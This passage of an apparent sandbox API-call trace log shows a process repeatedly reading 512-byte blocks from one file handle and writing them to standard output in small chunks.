lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.799] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] GetFileType (hFile=0x50) returned 0x1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.799] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.800] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.800] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] GetFileType (hFile=0x50) returned 0x1 [0225.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.800] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.801] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.801] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] GetFileType (hFile=0x50) returned 0x1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.801] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.802] GetFileType (hFile=0x50) returned 0x1 [0225.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.803] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.803] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.803] GetFileType (hFile=0x50) returned 0x1 [0225.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.804] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.804] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.804] GetFileType (hFile=0x50) returned 0x1 [0225.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] GetFileType (hFile=0x50) returned 0x1 [0225.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.805] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.806] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.806] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.806] GetFileType (hFile=0x50) returned 0x1 [0225.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.807] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.807] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.807] GetFileType (hFile=0x50) returned 0x1 [0225.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] GetFileType (hFile=0x50) returned 0x1 [0225.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.808] WriteFile (in: 